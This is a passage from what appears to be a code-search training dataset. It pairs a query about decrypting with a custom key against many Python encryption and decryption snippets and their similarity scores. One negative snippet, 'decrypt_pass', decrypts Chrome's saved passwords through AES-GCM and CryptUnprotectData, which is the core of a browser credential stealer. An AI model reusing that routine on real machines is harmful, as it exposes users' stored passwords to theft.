test_encryption(e, c)\n test_decryption(d, c)\n key_cracker(e, c)", "def decrypt_message(self, encrypted_message):\n f = Fernet(bytes(self.key))\n decrypted_message = f.decrypt(encrypted_message)\n return decrypted_message", "def test_encrypt_decrypt(self):\n reference = get_random_test_tensor()\n encrypted_tensor = SharedTensor(reference)\n self._check(encrypted_tensor, reference, 'en/decryption failed')", "def test_rekey_key_format(self):\n old_key = b'0' * 32\n encrypted = encrypt('message', key=old_key)\n\n with pytest.raises(EncryptionError):\n rekey(encrypted, old_key=old_key, new_key=b'1' * 31)", "def decrypt(ciphertext, key):\n\ttry:\n\t\tfrom Cryptodome.Cipher import AES\n\texcept ImportError:\n\t\tfrom Crypto.Cipher import AES\n\n\tif not isPython2():\n\t\tif isString(ciphertext):\n\t\t\tciphertext = ciphertext.encode(\"latin-1\")\n\t\tif isString(key):\n\t\t\tkey = key.encode(\"latin-1\")\n\t\t\n\tiv = ciphertext[:AES.block_size]\n\tcipher = AES.new(key, AES.MODE_CBC, iv)\n\tplaintext = cipher.decrypt(ciphertext[AES.block_size:])\n\treturn plaintext", "def decrypt(ciphertext):\n # AES decrypt\n iv = ciphertext[:16]\n ciphertext = ciphertext[16:]\n aes = AES.new(aes_key, AES.MODE_CBC, iv)\n return unpad(aes.decrypt(ciphertext))", "def test_encrypt_encoding(self):\n encrypted = encrypt('message')\n\n assert encrypted\n assert encrypted != 'message'\n assert type(encrypted) == str", "def unsleeve(self, encrypted_token: str) -> Tuple[bytes, int, int]:\n b64_decoded_token = base64.b64decode(encrypted_token)\n decrypted_token = self.decrypt(b64_decoded_token)\n\n payload, timestamp_ms, crc = tuple(\n decrypted_token.split(self.sep_token))\n\n return payload, int.from_bytes(timestamp_ms, 'big'), int.from_bytes(crc, 'big')", "def test_py3_transaction_exception_message_bytes_non_english():\n try:\n raise ValueError(BYTES_UTF8_ENCODED)\n except ValueError:\n notice_error()", "def from_db_value(self, value, expression, connection):\n return decrypt(value)", "def test_py2_transaction_exception_message_bytes_implicit_encoding_non_english():\n try:\n\n # Bytes literal with non-ascii compatible characters only allowed in\n # python 2\n\n raise ValueError('I💜🐍')\n except ValueError:\n notice_error()", "def decrypt(priv_key, ciphertext):\n pk_encrypted_secret_key = ciphertext['pk_encrypted_secret_key']\n sym_encrypted_data = ciphertext['sym_encrypted_data']\n # TODO: secure delete\n secret_key = decrypt_pk(priv_key, pk_encrypted_secret_key)\n encoded_string = decrypt_symmetric(secret_key, sym_encrypted_data)\n return decode_data(encoded_string)", "def test_encrypt_key(self):\n encrypted = encrypt('message', key=b'0' * 32)\n\n assert encrypted\n assert encrypted != 'message'", "def decryptAESBlock(key, ct):\n\tif len(ct) != 16 and len(ct) != 32:\n\t\traise Exception(\"Ciphertext is not length 16 or 32\")\n\tcipher = AES.new(key, AES.MODE_ECB)\n\treturn cipher.decrypt(ct)", "def decrypt(text: str, key: str = None):\n if not text.isdecimal():\n raise ValueError(\"Encrypted text must contain only numbers.\")\n tmpres = []\n lkey = []\n if key is not None:\n lkey = list(key.encode(\"utf-8\"))\n i = 0\n counter = 0\n while i < len(text):\n l = int(text[i])\n tmp = text[i + 1:i + l + 1]\n i += l + 1\n if not tmp:\n break\n if lkey:\n c = int(tmp) - lkey[counter % len(lkey)]\n else:\n pm = 1 if tmp[0] == \"0\" else -1\n ri = int(tmp[1]) * pm\n c = int(tmp[2:]) - ri\n tmpres.append(c)\n counter += 1\n return bytes(tmpres).decode(\"utf8\")", "def _decrypt(self, msg):\r\n # they must be real crypto experts at pubnub.com\r\n # two lines of code and two capital mistakes :-(\r\n # pylint: disable=E1101\r\n key = hashlib.sha256(self.cipher).hexdigest()[0:32]\r\n aes = AES.new(key, AES.MODE_CBC, \"0123456789012345\")\r\n decrypted = aes.decrypt(base64.decodestring(msg))\r\n return json.loads(decrypted[0:-ord(decrypted[-1])])", "def decrypt(self, input, key, iv) :\n pass", "def decrypt_message(self):\r\n\r\n\t\t#Will not let user input useless messages that cannot be decrypted.\r\n\t\twhile True:\r\n\t\t\tself.message = input(\"Please enter a message you would like to decrypt. --> \")\r\n\t\t\tif self.message != \"\" and len(self.message) > 4:\r\n\t\t\t\tbreak\r\n\t\t#Decrypts message but verifys correct key before giving user their decrypted message.\r\n\t\tself.right_key = True\r\n\t\twhile self.right_key:\r\n\t\t\tself.setup_key_decrypt()\r\n\t\t\tself.my_code = Decryptor(self.message, self.key).transfer_decrypt()\r\n\t\t\tself.verify_decrypt_key()\r\n\t\tprint(\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\n\")\r\n\t\tprint(\"Your decrypted message is\")\r\n\t\tprint(self.my_code + \"|\")", "def decrypt_data ( aes_key, data ) :\n decoded_data = decode_data( data )\n salt = decoded_data[ 0 : Crypto.Cipher.AES.block_size ]\n encrypted_data = decoded_data[ Crypto.Cipher.AES.block_size : ]\n cipher = Crypto.Cipher.AES.new( aes_key, Crypto.Cipher.AES.MODE_CFB, salt )\n decrypted_data = cipher.decrypt( encrypted_data )\n\n return decrypted_data", "def _post_decrypt_checks(self, aad, plaintext, protected_message, request_id):", "def decrypt_pass(self, cont):\r\n try:\r\n iv = cont[3:15]\r\n data = cont[15:]\r\n ciph = AES.new(self.chrome_key(), AES.MODE_GCM, iv)\r\n decrypted = ciph.decrypt(data)\r\n decrypted = decrypted[:-16].decode()\r\n return decrypted\r\n except:\r\n decrypted = win32crypt.CryptUnprotectData(buff, None, None, None, 0)\r\n return decrypted[1]", "def test_illgal_character(self):\n self.assertRaises(DecodingError, base62.to_decimal, '@@@@')", "def decrypt_kms_data(encrypted_data):\n if not AWS_REGION:\n return\n\n kms = boto3.client('kms', region_name=AWS_REGION)\n\n decrypted = kms.decrypt(CiphertextBlob=encrypted_data)\n\n if decrypted.get('KeyId'):\n # Decryption succeed\n decrypted_value = decrypted.get('Plaintext', '')\n if isinstance(decrypted_value, bytes):\n decrypted_value = decrypted_value.decode('utf-8')\n return decrypted_value", "def decrypt(self, key, data, mode, padding):\n # pylint: disable=unused-argument,no-self-use\n if hasattr(key, \"public_bytes\"):\n raise NotImplementedError('\"decrypt\" is not supported by public keys')\n try:\n return key.decrypt(data, padding.build())\n except Exception:\n error_message = \"Decryption failed\"\n _LOGGER.exception(error_message)\n raise DecryptionError(error_message)", "def decrypt(self, cypher):\n\n if self.crypt_private == \"\":\n raise ValueError(\"Error decrypting: No private encryption key found for {}\".format(self))\n\n key_private = RsaPrivateKey.Read(self.crypt_private)\n return key_private.Decrypt(cypher)", "def decrypt(key, input_token):\n try:\n target = decrypt_string(input_token.strip(), key=key)\n except InvalidToken:\n click.echo('Error: Token is invalid')\n sys.exit(1)\n\n click.echo('The decrypted result is: ', nl=False)\n click.echo(click.style(target, fg='blue'))", "def decrypt(self,e):\n if self._f is None or self._g is None:\n raise Exception(\"Private key not found.\")\n\n if e._N <= self._P.get_N():\n\n if not self._fp:\n self._fp = invert_in_p(self._f, self._P.get_N())\n if not self._fq:\n self._fq = invert_in2tor(self._f, self._P.get_N(), int(lg(self._P.get_q())))\n\n assert(self._h == self._fq * self._g)\n\n a = (self._f * e) % self._P.get_q()\n b = (self._fp * a) % self._P.get_p()\n\n return b # decrypted message\n else:\n raise Exception(\"e is too large, must be equal or under size %d\" % self._P.get_N())" ]
[ "0.7508658", "0.73156184", "0.7232054", "0.6764023", "0.66845644", "0.657834", "0.6562093", "0.65003294", "0.6460941", "0.6459456", "0.6367024", "0.63215554", "0.6274202", "0.62535083", "0.62495065", "0.62276834", "0.6201334", "0.6190526", "0.618059", "0.61519164", "0.61452615", "0.6136156", "0.6099021", "0.606818", "0.6026457", "0.5960535", "0.59432477", "0.59120756", "0.5902871", "0.5895447", "0.58910066", "0.58910066", "0.58754396", "0.58694", "0.5862942", "0.58516747", "0.58449835", "0.5840804", "0.5818914", "0.5815402", "0.5790657", "0.578842", "0.578645", "0.5770115", "0.5765773", "0.5752916", "0.5752096", "0.5733301", "0.5727293", "0.5725853", "0.57141256", "0.5695599", "0.5678035", "0.566142", "0.5659336", "0.5656544", "0.56561154", "0.5624676", "0.56203055", "0.56192464", "0.56131375", "0.5610483", "0.5592887", "0.55866677", "0.55812216", "0.5574962", "0.5559074", "0.55563605", "0.55455106", "0.55428696", "0.5540496", "0.5539701", "0.5536342", "0.55362034", "0.5523473", "0.5520655", "0.55098647", "0.5503502", "0.54924923", "0.5479769", "0.5477788", "0.54552937", "0.54429156", "0.54370356", "0.54088354", "0.5404223", "0.54041445", "0.5396272", "0.53840226", "0.538369", "0.5382598", "0.5381381", "0.53806293", "0.5378996", "0.53755736", "0.5373022", "0.5372942", "0.5364954", "0.5363529", "0.536014" ]
0.76258427
0
It accepts a custom decryption key.
def test_decrypt_key(self): key = b'0' * 32 encrypted = encrypt('message', key=key) assert decrypt(encrypted, key=key) == 'message'
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def decrypt(ciphertext: str, key: str) -> str:\n return encrypt(ciphertext, key)", "def test_decryption(d, c):\n\n#\td = int(raw_input(\"\\nEnter d from public key\\n\"))\n#\tc = int(raw_input(\"\\nEnter c from public key\\n\"))\n\n x = int(raw_input(\"\\nEnter number to decrypt\\n\"))\n decode(endecrypt(x, d, c))", "def _get_decryption_key(self, **options):\n\n raise CoreNotImplementedError()", "def _get_decryption_key(self, **options):\n\n return self._get_encryption_key(**options)", "def decrypt(self, key):\n super(MACDataUplinkMessage, self).decrypt(key, dir=0)", "def rsa_decrypt(cypher, privatekey):\r\n \r\n # A key object is created to interact with the PyCrypto\r\n # encryption suite. The object contains key data and\r\n # the necessary rsa functions.\r\n temp_key_obj = _rsa_keydict_to_keyobj(privatekey = privatekey) \r\n \r\n return _rsa_gluechops(cypher, temp_key_obj, temp_key_obj.decrypt)", "def _get_decryption_key(self, **options):\n\n return self._private_key", "def decrypt(cypher, priv_key):\n\n if not isinstance(priv_key, key.PrivateKey):\n raise TypeError(\"You must use the private key with decrypt\")\n\n return gluechops(cypher, priv_key.d, priv_key.n, decrypt_int)", "def test_decryption_private_key_not_given(self) -> None:\n\n given = \"Hello, World!\"\n\n encryptor = DataEncryption()\n\n self.assertRaises(ValueError, lambda: encryptor.decrypt_data(given))", "def test_decrypt_key_incorrect(self):\n right_key = b'0' * 32\n wrong_key = b'1' * 32\n\n encrypted = encrypt('message', key=right_key)\n\n with pytest.raises(EncryptionError):\n decrypt(encrypted, key=wrong_key)", "def decrypt(self,message, key):\n return self.translateMessage(message, key, \"decrypt\")", "def decrypt_pk(priv_key, ciphertext):\n try:\n plaintext = priv_key.decrypt(\n b64decode(ciphertext),\n padding.OAEP(\n mgf=padding.MGF1(algorithm=CryptoHash()),\n algorithm=CryptoHash(),\n label=None\n )\n )\n except UnsupportedAlgorithm as e:\n # a failure to dencrypt someone else's data is not typically a fatal\n # error, but in this particular case, the most likely cause of this\n # error is an old cryptography library\n logging.error(\"Fatal error: encryption hash {} unsupported, try upgrading to cryptography >= 1.4. Exception: {}\".format(\n CryptoHash, e))\n # re-raise the exception for the caller to handle\n raise e\n return plaintext", "def setup_key_decrypt(self):\r\n\t\tself.max_key = math.floor(len(self.message) / 2)\r\n\t\twhile True:\r\n\t\t\tkey = input(\"Please enter the key that was used to encrypt your message.--> \")\r\n\t\t\ttry:\r\n\t\t\t\tself.key = int(key)\r\n\t\t\texcept ValueError:\r\n\t\t\t\tprint(\"Key needs to be a number.\")\r\n\t\t\t\tcontinue\r\n\t\t\tif self.key > self.max_key: \t\t\t\r\n\t\t\t\tprint(f\"{key} is too big of a number.\")\r\n\t\t\telif self.key == 0:\r\n\t\t\t\tprint(\"0 cannot be a key.\")\t\t\t\t\r\n\t\t\telse:\t\t\t\r\n\t\t\t\tbreak", "def decrypt_key(data, key):\n data = MegaCrypto.base64_decode(data)\n return sum((MegaCrypto.str_to_a32(MegaCrypto.cbc_decrypt(data[_i:_i + 16], key))\n for _i in range(0, len(data), 16)), ())", "def _decrypt(self, key, value):\n payload = EncryptedPayload.from_json(value)\n if not payload:\n return value\n\n decrypted = self._kms_crypto.decrypt_payload(payload)\n if not decrypted:\n return value\n\n key_prefix = '%s=' % key\n if not decrypted.startswith(key_prefix):\n return value\n\n return decrypted[len(key_prefix):]", "def _decode_key(self, key):\n return key if not key or isinstance(key, str) else key.decode()", "def decryptor(file_name, key):\n\twith open(file_name, 'rb') as dfile:\n\t\tciphertext = dfile.read()\n\t\tdec = decrypt(key, ciphertext)\n\t\tdfile.close()\n\t\tdtext = \"The encrypted file was opened by macupdate.py by the user: \"\n\t\tcreateLog(dtext, 'logs/macupdate.log')\n\t\treturn dec", "def decrypt(self, key, dir):\n self.encrypt(key, dir)", "def test_decrypt_key_invalid(self):\n encrypted = encrypt('message', key=b'0' * 32)\n\n with pytest.raises(EncryptionError):\n decrypt(encrypted, key=b'0' * 31)", "def test_decrypt_key_default(self, settings):\n settings.CHITON_ENCRYPTION_KEY = b'0' * 32\n\n encrypted = encrypt('message')\n assert decrypt(encrypted) == 'message'\n\n settings.CHITON_ENCRYPTION_KEY = b'1' * 32\n with pytest.raises(EncryptionError):\n decrypt(encrypted)", "def decrypt(self, key, device, private_key):\n device_key = base64.b64decode(self.keys[device.id.hex])\n\n master_key = private_key_decrypt(private_key, device_key)\n\n if master_key is None:\n return\n\n return fernet_decrypt(self.values[key], master_key, self.salt)", "def decrypt(key, ciphertext):\n data = fk(keyGen(key)[1], ip(ciphertext))\n return fp(fk(keyGen(key)[0], swapNibbles(data)))", "def decrypt(self, data):", "def populate_ios_decryption_key(self, base64_key: bytes):\r\n # case: the base64 encoding can come in garbled, but still pass through decode_base64 as an\r\n # un-unicodeable 256 byte(?!) binary blob, but it base64 decodes into a 16 byte key. The fix\r\n # is to decode_base64 -> encode_base64, which magically creates the correct base64 blob. wtf\r\n try:\r\n base64_str: str = base64_key.decode()\r\n except UnicodeDecodeError:\r\n # this error case makes no sense\r\n base64_str: str = encode_base64(decode_base64(base64_key)).decode()\r\n \r\n try:\r\n IOSDecryptionKey.objects.create(\r\n file_name=self.file_name,\r\n base64_encryption_key=base64_str,\r\n participant=self.participant,\r\n )\r\n return\r\n except ValidationError as e:\r\n print(f\"ios key creation FAILED for '{self.file_name}'\")\r\n # don't fail on other validation errors\r\n if \"already exists\" not in str(e):\r\n raise\r\n \r\n extant_key: IOSDecryptionKey = IOSDecryptionKey.objects.get(file_name=self.file_name)\r\n # assert both keys are identical.\r\n if extant_key.base64_encryption_key != base64_str:\r\n print(\"ios key creation unknown error 2\")\r\n raise IosDecryptionKeyDuplicateError(\r\n f\"Two files, same name, two keys: '{extant_key.file_name}': \"\r\n f\"extant key: '{extant_key.base64_encryption_key}', '\"\r\n f\"new key: '{base64_str}'\"\r\n )", "def decode_and_decrypt(encoded_data, key):\r\n return aes_decrypt(base64.urlsafe_b64decode(encoded_data), key)", "def decrypt(key, cipher, plaintext):\n\n rsa = Rsa()\n\n try:\n k = TomlKeyFormatter().from_string(key.read())\n\n c = cipher.read()\n p = rsa.decrypt(c, k)\n\n plaintext.write(p)\n\n except KeyFormatError:\n click.echo(\"ERROR: Key is in bad format\")\n\n except DecryptError:\n click.echo(\"ERROR: Key is wrong or message was badly padded before encryption\")", "def decrypt(data, key):\n data = six.ensure_binary(data)\n try:\n data = privy.peek(hidden=data, password=key)\n except ValueError:\n error = \"Unable to decrypt {cnt} bytes of data using key {k}, invalid key!\"\n error = error.format(cnt=len(data), k=key)\n raise exceptions.ModuleError(error)\n return six.ensure_text(data)", "def decrypt(self, input, key, iv) :\n pass", "def decrypt(key, cipher, use_custom=False):\n result = logic(key, cipher, use_custom)\n return array.array(\"B\", result)", "def decrypt_data(self, encrypted_data):\n raise NotImplementedError", "def decrypt(key, input_token):\n try:\n target = decrypt_string(input_token.strip(), key=key)\n except InvalidToken:\n click.echo('Error: Token is invalid')\n sys.exit(1)\n\n click.echo('The decrypted result is: ', nl=False)\n click.echo(click.style(target, fg='blue'))", "def decrypt(priv_key, ciphertext):\n pk_encrypted_secret_key = ciphertext['pk_encrypted_secret_key']\n sym_encrypted_data = ciphertext['sym_encrypted_data']\n # TODO: secure delete\n secret_key = decrypt_pk(priv_key, pk_encrypted_secret_key)\n encoded_string = decrypt_symmetric(secret_key, sym_encrypted_data)\n return decode_data(encoded_string)", "def _disabled_decrypt(self, *args, **kwargs):\n raise NotImplementedError('\"decrypt\" is not supported by the \"{}\" algorithm'.format(self.java_name))", "def asym_dec(self, ciph, keyfile):\n ciph = ciph.split('\\0')\n ciphkey_len = int(ciph[0])\n ciph = '\\0'.join(ciph[1:])\n ciphkey = ciph[:ciphkey_len]\n ciph = ciph[ciphkey_len:]\n\n passphrase = xsystem([self.sslname, 'rsautl', '-decrypt', '-inkey',\n keyfile], ciphkey)\n if not passphrase:\n warning('keymanagement: Unable to perform asymmetric decryption\\n')\n return None\n\n return self.sym_dec(ciph, passphrase)", "def decrypt(path, key):\n key = load_key(key)\n\n if p.isdir(path):\n # encrypt a directory\n return decrypt_dir(path, key)\n # decrypt a file\n path = decrypt_file(path, key)\n # check if file contains suffix\n if \"-encrypted.zip\" in path:\n return decrypt_dir(path, key)\n return", "def decrypt(self, ciphertext: bytes,\n padding: AsymmetricPadding) -> bytes:\n pass", "def decrypt_data_key(self, dataKeyCypher, token, userGroup):\n masterKey = self.retrieve_master_key(token=token, userGroup=userGroup)\n box = secret.SecretBox(masterKey)\n if isinstance(dataKeyCypher, str):\n dataKeyCypher = dataKeyCypher.encode('cp855')\n try:\n plainText = box.decrypt(dataKeyCypher).decode('utf-8')\n except Exception:\n raise UnableToDecryptException(\"Unable to verify cyphertext/key pair\")\n return plainText", "def _decrypt_data_key(self, encrypted_data_key, algorithm, encryption_context):\n # Wrapped EncryptedDataKey to deserialized EncryptedData\n encrypted_wrapped_key = aws_encryption_sdk.internal.formatting.deserialize.deserialize_wrapped_key(\n wrapping_algorithm=self.config.wrapping_key.wrapping_algorithm,\n wrapping_key_id=self.key_id,\n wrapped_encrypted_key=encrypted_data_key,\n )\n # EncryptedData to raw key string\n plaintext_data_key = self.config.wrapping_key.decrypt(\n encrypted_wrapped_data_key=encrypted_wrapped_key, encryption_context=encryption_context\n )\n # Raw key string to DataKey\n return DataKey(\n key_provider=encrypted_data_key.key_provider,\n data_key=plaintext_data_key,\n encrypted_data_key=encrypted_data_key.encrypted_data_key,\n )", "def aes_decrypt(encrypted_data, key):\r\n cipher = aes_cipher_from_key(key)\r\n padded_data = cipher.decrypt(encrypted_data)\r\n return unpad(padded_data)", "def decrypt(self, cypher):\n\n if self.crypt_private == \"\":\n raise ValueError(\"Error decrypting: No private encryption key found for {}\".format(self))\n\n key_private = RsaPrivateKey.Read(self.crypt_private)\n return key_private.Decrypt(cypher)", "def _decrypt(self, value, **options):\n\n raise CoreNotImplementedError()", "def decrypt_char(o, k):\n o1 = ord(o) # outfile char\n k1 = ord(k) # keyfile char\n\n x = o1 ^ 0x80\n x = x - k1\n if x >= 0x1 and x <= 0x7e:\n return chr(x)\n\n x = o1 - k1\n if x >= 0x1 and x <= 0x7e:\n return chr(x)\n\n return None", "def decrypt(self, key, data, mode, padding):\n # pylint: disable=unused-argument,no-self-use\n if hasattr(key, \"public_bytes\"):\n raise NotImplementedError('\"decrypt\" is not supported by public keys')\n try:\n return key.decrypt(data, padding.build())\n except Exception:\n error_message = \"Decryption failed\"\n _LOGGER.exception(error_message)\n raise DecryptionError(error_message)", "def test_get_private_key(self):\n\n expected = self.pem_private_key\n\n encryptor = DataEncryption()\n encryptor.set_private_key(self.pem_private_key.decode())\n\n actual = encryptor.get_private_key()\n\n self.assertEqual(expected, actual)", "def private_key(\n self,\n key: str,\n default: Any = undefined,\n description: str = None,\n key_format: Optional[EncryptionKeyFormat] = None,\n passphrase: Optional[str] = None,\n **kwargs\n ) -> Optional[PrivateKey]:\n cast_key = partial(cast_private_key, key_format=key_format, passphrase=passphrase)\n return self._process(key, description=description, default=default, cast=cast_key,type=PrivateKey, **kwargs)", "def _decrypt(self, data, key):\n seed1 = key\n seed2 = 0xEEEEEEEE\n result = BytesIO()\n\n for i in range(len(data) // 4):\n seed2 += self.encryption_table[0x400 + (seed1 & 0xFF)]\n seed2 &= 0xFFFFFFFF\n value = struct.unpack(\"<I\", data[i*4:i*4+4])[0]\n value = (value ^ (seed1 + seed2)) & 0xFFFFFFFF\n\n seed1 = ((~seed1 << 0x15) + 0x11111111) | (seed1 >> 0x0B)\n seed1 &= 0xFFFFFFFF\n seed2 = value + seed2 + (seed2 << 5) + 3 & 0xFFFFFFFF\n\n result.write(struct.pack(\"<I\", value))\n\n return result.getvalue()", "def __init__(self, key):\n if len(key) > KEY_SIZE:\n raise ParameterError(\"Key must be <%d bytes\" % (KEY_SIZE))\n\n self.key = key.ljust(KEY_SIZE, b\"\\xff\")\n self.encryptIV = b\"\\xff\" * BLOCK_SIZE\n self.decryptIV = b\"\\xff\" * BLOCK_SIZE\n self.remainingData = b\"\"\n self.oldDecrypt = b\"\"", "def decrypt(self, key, encrypted):\n output = []\n padded_key = padd_key(key, encrypted)\n for i in range(len(encrypted)):\n dec_ascii = (ord(encrypted[i]) - ord(padded_key[i])) % 256\n output.append(chr(dec_ascii))\n return ''.join(output)", "def decrypt_symmetric(self, ciphertext):\n from google.cloud import kms_v1\n\n # Creates an API client for the KMS API.\n client = kms_v1.KeyManagementServiceClient()\n\n # The resource name of the CryptoKey.\n name = client.crypto_key_path_path(self.project_id, self.location_id, self.key_ring_id,\n self.crypto_key_id)\n # Use the KMS API to decrypt the data.\n response = client.decrypt(name, ciphertext)\n return response.plaintext", "def decrypt(text,key):\r\n aes = pyaes.AESModeOfOperationCTR(key)\r\n decrypted = aes.decrypt(text)\r\n return decrypted", "def decrypt(self, encrypted_token: bytes) -> bytes:\n return None", "def decrypt(message, key):\r\n\r\n # --- YOU CODE STARTS HERE\r\n if type(message) != str or type(key) != int:\r\n return 'Invalid input'\r\n new_st = ''\r\n alpha_lower = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']\r\n alpha_upper = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z']\r\n\r\n for x in message:\r\n if (alpha_lower.count(x) != 0) or (alpha_upper.count(x) != 0):\r\n if alpha_lower.count(x) != 0:\r\n new_st += alpha_lower[alpha_lower.index(x) - key]\r\n if alpha_upper.count(x) != 0:\r\n new_st += alpha_upper[alpha_upper.index(x) - key]\r\n else:\r\n new_st += x\r\n\r\n return new_st\r\n\r\n\r\n # --- CODE ENDS HERE\r", "def test_set_private_key(self) -> None:\n\n expected = self.pem_private_key.decode()\n\n encryptor = DataEncryption(private_key=self.pem_private_key)\n\n # pylint: disable=protected-access\n actual = encryptor._loaded_private_key.private_bytes(\n serialization.Encoding.PEM,\n serialization.PrivateFormat.PKCS8,\n serialization.NoEncryption(),\n ).decode()\n\n self.assertEqual(expected, actual)", "def test_endecrypt():\n\n e, d, c = keygen()\n\n test_encryption(e, c)\n test_decryption(d, c)\n key_cracker(e, c)", "def decrypt(ciphertext, key):\n\ttry:\n\t\tfrom Cryptodome.Cipher import AES\n\texcept ImportError:\n\t\tfrom Crypto.Cipher import AES\n\n\tif not isPython2():\n\t\tif isString(ciphertext):\n\t\t\tciphertext = ciphertext.encode(\"latin-1\")\n\t\tif isString(key):\n\t\t\tkey = key.encode(\"latin-1\")\n\t\t\n\tiv = ciphertext[:AES.block_size]\n\tcipher = AES.new(key, AES.MODE_CBC, iv)\n\tplaintext = cipher.decrypt(ciphertext[AES.block_size:])\n\treturn plaintext", "def decrypt(enc_data=None, pk=None, sk=None, pairing_group=None, debug=0):\n\n # Check if enc_data is set\n if enc_data is None:\n logging.error('decrypt_seed_key ciphertext exception')\n if debug: # ONLY USE FOR DEBUG\n print('EXCEPTION in decrypt_seed_key ciphertext')\n raise Exception\n\n # Check if pk is set and it exists\n if pk is None:\n logging.error('[ERROR] decrypt_seed_key pk_file exception')\n if debug: # ONLY USE FOR DEBUG\n print('EXCEPTION in decrypt_seed_key pk_file')\n raise Exception\n\n # Check if sk is set and it exists\n if sk is None:\n logging.error('decrypt_seed_key sk_file exception')\n if debug: # ONLY USE FOR DEBUG\n print('EXCEPTION in decrypt_seed_key sk_file')\n raise Exception\n\n # Decrypt data with CP-ABE and return the result\n cpabe = CPabe_BSW07(pairing_group)\n return cpabe.decrypt(pk, sk, enc_data)", "def rsa_decrypt(data, rsa_priv_key_str):\r\n key = RSA.importKey(rsa_priv_key_str)\r\n cipher = PKCS1_OAEP.new(key)\r\n return cipher.decrypt(data)", "def decrypt(cls, ciphertext_and_tag, aad, key, iv):", "def decrypt_symmetric(secret_key, ciphertext, ttl=None):\n f = Fernet(secret_key)\n # fernet requires the ciphertext to be bytes, it will raise an exception\n # if it is a string\n return f.decrypt(bytes(ciphertext), ttl)", "def decrypt(self, cypher):\n\n cypher = b64decode(cypher)\n key_private = RsaPrivateKey.Read(self.crypt_private)\n return key_private.Decrypt(cypher)", "def Decrypt(key, value):\n key = key.zfill(32)[:32]\n aes = AES.new(key, AES.MODE_ECB)\n encrypted = base64.b64decode(value)\n decrypted = aes.decrypt(encrypted)\n return RemovePadding(decrypted)", "def load_key(self, key, key_type, key_encoding):\n if key_type is not EncryptionKeyType.SYMMETRIC:\n raise ValueError(\n 'Invalid key type \"{key_type}\" for cipher \"{cipher}\"'.format(key_type=key_type, cipher=self.java_name)\n )\n\n if key_encoding is not KeyEncodingType.RAW:\n raise ValueError(\n 'Invalid key encoding \"{key_encoding}\" for cipher \"{cipher}\"'.format(\n key_encoding=key_encoding, cipher=self.java_name\n )\n )\n\n return key", "def decrypt_message(encrypted_message):", "def decrypt(key, encoded):\n \n if isinstance(encoded, str):\n encoded = map(ord, encoded)\n key = _key_array(key)\n aes = mxit.aes.AES()\n \n parts = _split(encoded, 16)\n decoded = []\n for part in parts:\n decoded += aes.decrypt(part, key, aes.keySize[\"SIZE_128\"]) \n return _get_text(decoded)", "def decrypt_epic(aes_key, encrypted_data):\n # Decode encrypted string\n decoded = base64.b64decode(encrypted_data)\n\n # Decrypt decoded string\n decoded_readable = CryptDecrypt(aes_key, decoded).decode('utf-8')\n return decoded_readable", "def decrypt_epic(aes_key, encrypted_data):\n # Decode encrypted string\n decoded = base64.b64decode(encrypted_data)\n\n # Decrypt decoded string\n decoded_readable = CryptDecrypt(aes_key, decoded).decode('utf-8')\n return decoded_readable", "def decrypt(data, private_key):\r\n\r\n # Retrieve session key, tag, ciphertext and nonce from file\r\n enc_session_key, nonce, tag, ciphertext = \\\r\n [ file_in.read(x) for x in (private_key.size_in_bytes(), 16, 16, -1) ]\r\n\r\n\r\n # Decrypt the session key\r\n session_key = cipher_rsa.decrypt(enc_session_key)\r\n\r\n # Decrypt the data with the AES session key\r\n cipher_aes = AES.new(session_key, AES.MODE_EAX, nonce)\r\n data = cipher_aes.decrypt_and_verify(ciphertext, tag)\r\n\r\n return data", "def fernet_decript(key,message):\n\tf = Fernet(key)\n\treturn f.decrypt(message)", "def extract_aes_key(self) -> bytes:\r\n log(\"extract_aes_key start\")\r\n try:\r\n key_base64_raw: bytes = self.file_lines[0]\r\n except IndexError:\r\n # shouldn't be reachable due to test for emptiness prior in code, keep around anyway.\r\n log(\"extract_aes_key fail 1\")\r\n raise DecryptionKeyInvalidError(\"There was no decryption key.\")\r\n \r\n # Test that every byte in the byte-string of the raw key is a valid url-safe base64\r\n # character this also cuts down some junk files.\r\n for c in key_base64_raw:\r\n if c not in URLSAFE_BASE64_CHARACTERS:\r\n log(f\"extract_aes_key fail 2: '{key_base64_raw.decode()}' character: '{chr(c)}'\")\r\n raise DecryptionKeyInvalidError(f\"Key not base64 encoded: {str(key_base64_raw)}\")\r\n \r\n # handle the various cases that can occur when extracting from base64.\r\n try:\r\n decoded_key: bytes = decode_base64(key_base64_raw)\r\n except (TypeError, PaddingException, Base64LengthException) as decode_error:\r\n log(\"extract_aes_key fail 3\")\r\n raise DecryptionKeyInvalidError(f\"Invalid decryption key: {decode_error}\")\r\n \r\n base64_key = self.rsa_decrypt(decoded_key)\r\n \r\n try:\r\n decrypted_key: bytes = decode_base64(base64_key)\r\n if not decrypted_key:\r\n log(\"extract_aes_key fail 4\")\r\n raise TypeError(f\"decoded key was '{decrypted_key}'\")\r\n except (TypeError, IndexError, PaddingException, Base64LengthException) as decr_error:\r\n log(\"extract_aes_key fail 5\")\r\n raise DecryptionKeyInvalidError(f\"Invalid decryption key: {decr_error}\")\r\n \r\n # If the decoded bits of the key is not exactly 128 bits (16 bytes) that probably means that\r\n # the RSA encryption failed - this occurs when the first byte of the encrypted blob is all\r\n # zeros. Apps require an update to solve this (in a future rewrite we should use a correct\r\n # padding algorithm).\r\n if len(decrypted_key) != 16:\r\n log(\"extract_aes_key 6\")\r\n raise DecryptionKeyInvalidError(f\"Decryption key not 128 bits: {decrypted_key}\")\r\n \r\n if self.participant.os_type == IOS_API:\r\n self.populate_ios_decryption_key(base64_key)\r\n \r\n log(\"extract_aes_key success\")\r\n return decrypted_key", "def decrypt_letter(letter, keystr_value):\n \n letter_value = ord(letter) - 65\n if (letter_value - keystr_value) < 0:\n new_value = letter_value - keystr_value + 26 + 65\n decrypted_letter = chr(new_value)\n else:\n new_value = letter_value - keystr_value + 65\n decrypted_letter = chr(new_value)\n return decrypted_letter", "def decrypt(key: str, encrypted: str) -> 